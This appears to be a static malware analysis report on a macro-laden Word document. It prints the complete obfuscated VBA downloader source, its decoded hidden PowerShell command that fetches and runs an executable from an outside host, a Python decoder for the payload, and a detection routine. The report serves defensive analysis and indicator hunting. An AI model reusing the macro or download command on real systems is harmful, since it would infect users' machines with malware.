Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f584ec598c2926ec…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 40.1 KB
Created: 2017-05-22 22:37:00 UTC (document core-properties metadata, written by the authoring tool and trivially editable, so not a reliable timeline anchor; note the 20-month gap to first sighting)
Authoring application: Microsoft Office Word 12.0000 (Word 2007)
First seen: 2019-01-20
MD5: ec8bae15417dcc2ba4b92a03904ef297
SHA-1: f1879f675834d2ac2db61ca72033b5e7ef892881
SHA-256: f584ec598c2926ecd0ee48c84a0a4e6d780de993281f390f6f93f014649fd2f2
Risk score: 292

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution (as tagged by the analysis platform; nothing in this sample exploits a vulnerability. The macro runs only after the user enables content, so T1204.002 User Execution: Malicious File describes the initial execution more precisely)

The sample is an OOXML Word document whose VBA project holds three modules: ThisDocument, Module1 and an empty Module2. Nothing runs unless the user enables macros, and the trigger is document close, not open: ThisDocument.AutoClose stores a 293-character obfuscated string in Crested_Penguin and hands it via Application.Run to Labrador_Retriever, which passes it, together with the 293-digit key Scorpion, to Module1.Bearded_Dragon. Bearded_Dragon is a per-character subtraction cipher: output character i is ChrW(AscB(ciphertext(i)) - Int(Mid(key, i, 1))). The Asc("...") - Asc("...") expressions in Emperor_Tamarin and Poodle, the trailing "- 0", and the Persian and Malayan_Civet parameters are inert padding. The decoded string is executed with CreateObject("WScript.Shell").Run(..., 0), i.e. in a hidden window. Applying the key on this page to the ciphertext on this page yields:

powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://mnmnzxczxcasd.com/okas/dandga.dat', $env:APPDATA + '\WPII.exe'); Start-Process $env:APPDATA'\WPII.exe'; (New-Object System.Net.WebClient).DownloadString('http://mnmnzxczxcasd.com/s.php?id=dandga')

The macro is therefore a downloader, not an exploit: it pulls a second-stage executable into %APPDATA%\WPII.exe, launches it, then issues a second request that looks like an install check-in (the page does not show what that URL returns). Indicators to block and hunt for are the host mnmnzxczxcasd.com, the two URL paths, and WPII.exe under %APPDATA%; the PowerShell stage additionally maps to T1059.001 (PowerShell) and T1105 (Ingress Tool Transfer). The ClamAV signature Doc.Malware.Emooodldr-6711604-0, which fires on the raw vbaProject.bin stream, is consistent with this behaviour.
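As an added worked example (not part of the original report and not the sample's own code), the Python below ports Module1.Bearded_Dragon together with its helper functions and runs it over the ciphertext and key copied verbatim from the macros.bas listing further down this page. It then pulls the URLs, the host and the dropped file name out of the decoded command, which is what an analyst feeds into blocking and hunting. The regular expressions and the function names are this example's own; only the two long strings come from the page.

```python
import re

# Ciphertext (Crested_Penguin) and key (Scorpion), copied verbatim from the
# macros.bas listing in this report. The key is 293 decimal digits, one per
# ciphertext character; it only looks like base64 to a blob heuristic.
CIPHERTEXT = (
    r"qpyhuukgmn0g{e /nor 0G{ec!Cyrcuv -Doombqg *Ohy.Qbkhdw!Syuuhp0Pgt.ZfcElihpv).Gowq"
    r"mpcfFlne*'huwq:/2nqon{yf|{fcue.eon2qnbt/gdogia0gcw). $hqv:DPQFCVB!,!*_YSKJ/f{g*+"
    r"> Vuarw.Prpdhut 'env:AQRFDUC(\XPKJ/e{g';!(Ogx.Qelhdw Szstfm0Ngt0YfbEojhpt,0Fqxnl"
    r"rbgTtrloj**juvq:/0nnmp}{c|xedvd/dqp2u.rjpAjf=gaogga),"
)
KEY = (
    "11233232122230020020323001102223001020133021321201313100213322200311200322003003"
    "11220320200131003132011323322102013231103313202323220033003012221111332321113232"
    "30310031001132103000001223121010211032001012112323130010010202022102313203222100"
    "31310031323212100110023302023301123320220212030130023"
)


def bearded_dragon(dodo: str, newfoundland: str) -> str:
    """Port of Module1.Bearded_Dragon and its helpers.

    Per 1-based position i the VBA does:
        Dolphin        = Dunker(key, i)         -> Int(Mid(key, i, 1)), the i-th key digit
        Asian_Elephant = Emperor_Tamarin(char)  -> AscB(char) minus a term that is always 0
        Asian_Elephant = Asian_Elephant - Dolphin - 0
        Persian        = Persian & Poodle(...)  -> ChrW(value minus a term that is always 0)
    The zero terms are dropped here. Persian (the accumulator) and Malayan_Civet
    are unused inputs in the original.
    """
    if len(newfoundland) < len(dodo):
        # Mid() past the end of the key returns "" and Int("") raises a
        # type-mismatch error in VBA; fail loudly instead of decoding garbage.
        raise ValueError("key shorter than ciphertext")
    if not newfoundland[: len(dodo)].isdigit():
        raise ValueError("key must be decimal digits")
    return "".join(chr(ord(c) - int(k)) for c, k in zip(dodo, newfoundland))


def decode_command() -> str:
    """The string the macro passes to WScript.Shell.Run (window style 0 = hidden)."""
    # Labrador_Retriever applies RTrim/LTrim to the key; both are no-ops here.
    return bearded_dragon(CIPHERTEXT, KEY.strip())


# Indicator extraction. These regexes are this example's own and cover the
# WebClient call shapes in this sample, not every way PowerShell can spell a URL.
URL_RE = re.compile(r"""https?://[^\s'"()]+""")
EXE_RE = re.compile(r"\\([A-Za-z0-9_.-]+\.exe)")


def indicators(cmd: str) -> dict:
    """Network and host indicators from a decoded PowerShell one-liner."""
    urls = URL_RE.findall(cmd)
    return {
        "urls": urls,
        "hosts": sorted({u.split("/")[2] for u in urls}),
        "dropped_exes": sorted(set(EXE_RE.findall(cmd))),
    }


if __name__ == "__main__":
    cmd = decode_command()
    print(cmd)
    for name, value in indicators(cmd).items():
        print(f"{name}: {value}")
```

The length guard matters in practice: this family varies the key length between samples, and a key that is too short makes the VBA raise at runtime rather than run a truncated command, which is worth knowing when a sandbox reports "macro errored out" for a sibling sample.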

Heuristics (8)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML [medium, OOXML_VBA, 4 related findings]
    Document contains a VBA project (VBA macros present)
  • WScript.Shell usage [critical, OLE_VBA_WSCRIPT]
    Matched lines in script:
      Scorpion = RTrim("11233232122230020020323001102223001020133021321201313100213322200311200322003003112203202001310031320113233221020132311033132023232200330030122211113323211132323031003100113210300000122312101021103200101211232313001001020202210231320322210031310031323212100110023302023301123320220212030130023")
      Call CreateObject("WScript.Shell").Run(Module1.Bearded_Dragon(Humpback_Whale, LTrim(Scorpion), "", "Bonobo Liger"), 0)
    End Function
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    Matched lines in script:
      Scorpion = RTrim("11233232122230020020323001102223001020133021321201313100213322200311200322003003112203202001310031320113233221020132311033132023232200330030122211113323211132323031003100113210300000122312101021103200101211232313001001020202210231320322210031310031323212100110023302023301123320220212030130023")
      Call CreateObject("WScript.Shell").Run(Module1.Bearded_Dragon(Humpback_Whale, LTrim(Scorpion), "", "Bonobo Liger"), 0)
    End Function
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This check catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
  • Auto_Close macro [low, OLE_VBA_AUTOCLOSE]
    Matched lines in script:
      Attribute VB_Customizable = True
      Sub AutoClose()
        Dim Crested_Penguin As String
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All six URLs below are standard OOXML/WordprocessingML XML namespace identifiers; they are never contacted at runtime and carry no indicator value. The real network indicators in this sample exist only inside the obfuscated macro string and never appear in the URL extractor's output.
      • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
      • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
      • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
      • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
      • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
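As an added example of the check behind the OLE_VBA_PCODE_AUTOEXEC_EXEC and OLE_VBA_AUTOCLOSE findings (illustration code, not the analysis platform's implementation), the Python below requires an auto-execution entry point and an execution or download token in the same VBA blob before it fires, and scans the bytes both as 8-bit text and as UTF-16LE so that it still works on a module stream where only compiled p-code and its name table survive. The token lists, the regexes and the sample input are this example's own; the sample is abridged from the AutoClose and Labrador_Retriever routines in the macros.bas listing below, with the long obfuscated string replaced by a placeholder.

```python
import re

# Auto-execution entry points for Word and Excel VBA (VBA names are case-insensitive).
AUTOEXEC_RE = re.compile(
    r"\b(Auto_?Open|Auto_?Close|Auto_?Exec|Auto_?New|Auto_?Exit|"
    r"Document_Open|Document_Close|Document_New|Workbook_Open|Workbook_Close)\b",
    re.IGNORECASE,
)
# Tokens that launch or fetch something. Deliberately broad: the pairing with an
# auto-exec trigger is what keeps the false-positive rate acceptable.
EXEC_RE = re.compile(
    r"(WScript\.Shell|Shell\.Application|CreateObject|Application\.Run|"
    r"\bShell\b|\.Run\b|\bExec\b|URLDownloadToFile|XMLHTTP|WinHttp|"
    r"WebClient|powershell|cmd\.exe|mshta|rundll32|regsvr32)",
    re.IGNORECASE,
)


def _views(blob: bytes):
    """Text views worth scanning: plain 8-bit source, and UTF-16LE for
    name-table and string entries stored that way (assumption of this example)."""
    yield blob.decode("latin-1")
    yield blob.decode("utf-16-le", errors="ignore")


def triage_vba(blob: bytes) -> dict:
    """Flag a VBA blob that has an auto-exec trigger AND an execution/download token."""
    autoexec, exec_tokens = set(), set()
    for text in _views(blob):
        autoexec.update(m.group(0) for m in AUTOEXEC_RE.finditer(text))
        exec_tokens.update(m.group(0) for m in EXEC_RE.finditer(text))
    return {
        "autoexec": sorted(autoexec),
        "exec_tokens": sorted(exec_tokens),
        "hit": bool(autoexec) and bool(exec_tokens),
    }


# Constructed sample, abridged from the ThisDocument module in this report; the
# 293-character ciphertext is replaced by "<obfuscated>" and the key shortened.
SAMPLE_SOURCE = b"""Sub AutoClose()
  Dim Crested_Penguin As String
  Crested_Penguin = "<obfuscated>"
  Application.Run "Labrador_Retriever", Crested_Penguin
End Sub

Public Function Labrador_Retriever(Humpback_Whale As String)
  Dim Scorpion As String
  Scorpion = RTrim("1123323212")
  Call CreateObject("WScript.Shell").Run(Module1.Bearded_Dragon(Humpback_Whale, LTrim(Scorpion), "", "Bonobo Liger"), 0)
End Function
"""

# Constructed control: an auto-exec stub that only toggles a document setting.
BENIGN_SOURCE = b"""Sub AutoOpen()
  ActiveDocument.TrackRevisions = True
End Sub
"""

if __name__ == "__main__":
    cases = (
        ("sample", SAMPLE_SOURCE),
        ("benign", BENIGN_SOURCE),
        ("sample as UTF-16LE", SAMPLE_SOURCE.decode("ascii").encode("utf-16-le")),
    )
    for name, blob in cases:
        print(name, triage_vba(blob))
```

Note what the sample shows about coverage: the only tokens visible in the loader are WScript.Shell, CreateObject and the .Run calls. The strings that would normally trip a scanner (powershell, WebClient, the URLs) are inside the obfuscated blob and only become visible after decoding, which is why the platform scores the loader pattern rather than searching for payload keywords.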

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
    Size: 2482 bytes
    SHA-256: b12fbbd024e65ccc5526748728086524ffc5b1dbc37aea07ab70b3b5c1f36c27
    Detection: ClamAV: No threats found (the Emooodldr signature matches the raw vbaProject.bin stream listed below, not the decompressed source text, so scanning extracted source alone would not have produced the ClamAV verdict)
    Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob. In this sample that blob is the 293-digit key Scorpion, which is decimal digits rather than base64 data: the flag is right that it is obfuscation material but wrong about the encoding, and base64-decoding it yields nothing useful.
    Preview script: the viewer shows at most the first 1,000 lines; this script is shorter, so the listing below is complete. olevba concatenates the modules in order (ThisDocument, Module1, Module2), each beginning at its Attribute VB_Name line.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
  Dim Crested_Penguin As String
  Crested_Penguin = "qpyhuukgmn0g{e /nor 0G{ec!Cyrcuv -Doombqg *Ohy.Qbkhdw!Syuuhp0Pgt.ZfcElihpv).GowqmpcfFlne*'huwq:/2nqon{yf|{fcue.eon2qnbt/gdogia0gcw). $hqv:DPQFCVB!,!*_YSKJ/f{g*+> Vuarw.Prpdhut 'env:AQRFDUC(\XPKJ/e{g';!(Ogx.Qelhdw Szstfm0Ngt0YfbEojhpt,0FqxnlrbgTtrloj**juvq:/0nnmp}{c|xedvd/dqp2u.rjpAjf=gaogga),"
  Application.Run "Labrador_Retriever", Crested_Penguin
End Sub

Public Function Labrador_Retriever(Humpback_Whale As String)
  Dim Scorpion As String
  Scorpion = RTrim("11233232122230020020323001102223001020133021321201313100213322200311200322003003112203202001310031320113233221020132311033132023232200330030122211113323211132323031003100113210300000122312101021103200101211232313001001020202210231320322210031310031323212100110023302023301123320220212030130023")
  Call CreateObject("WScript.Shell").Run(Module1.Bearded_Dragon(Humpback_Whale, LTrim(Scorpion), "", "Bonobo Liger"), 0)
End Function

Attribute VB_Name = "Module1"
Option Explicit

Public Function Emperor_Tamarin(Grasshopper As String) As Integer
  Emperor_Tamarin = (AscB(Grasshopper) - (Asc("Newfoundland Squid Pygmy_Marmoset Moth Woodpecker") - Asc("Newfoundland Squid Pygmy_Marmoset Moth Woodpecker")))
End Function


Public Function Dunker(Golden_Oriole, Fox_Terrier) As Integer
  Dim Lemming As Integer
  Lemming = Int(Mid(Golden_Oriole, Fox_Terrier, 1))
  Dunker = Lemming
End Function

Public Function Bearded_Dragon(Dodo As String, Newfoundland As String, Persian As String, Malayan_Civet As String)
  Dim Fly As Integer
  For Fly = 1 To Len(Dodo)
     Dim Dolphin As Integer
     Dolphin = Dunker(Newfoundland, Fly)

     Dim Bull_Mastiff As String
     Dim Asian_Elephant As Integer

      Bull_Mastiff = Mid(Dodo, Fly, 1)
      Asian_Elephant = Emperor_Tamarin(Bull_Mastiff)
      Asian_Elephant = Asian_Elephant - Dolphin - 0

    Persian = Persian & Poodle(Asian_Elephant)
  Next
  
  Bearded_Dragon = Persian
End Function


Public Function Poodle(White_Rhinoceros As Integer)
  Poodle = ChrW(White_Rhinoceros - (Asc("Bonobo Liger") - Asc("Bonobo Liger")))
End Function

Attribute VB_Name = "Module2"
  • vbaProject_00.bin
    Kind: vba-project
    Source: OOXML VBA project: word/vbaProject.bin
    Size: 15360 bytes
    SHA-256: cb0790439b480c37db8f4d749d38fabb3cd293b1d4fc2897f67404ae0933e23a
    Detection: ClamAV: Doc.Malware.Emooodldr-6711604-0 (the signature hits this stream, consistent with the file-level verdict above)
    Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob (most likely the same digit-only key string, since the module source is stored inside this stream; see the macros.bas note above).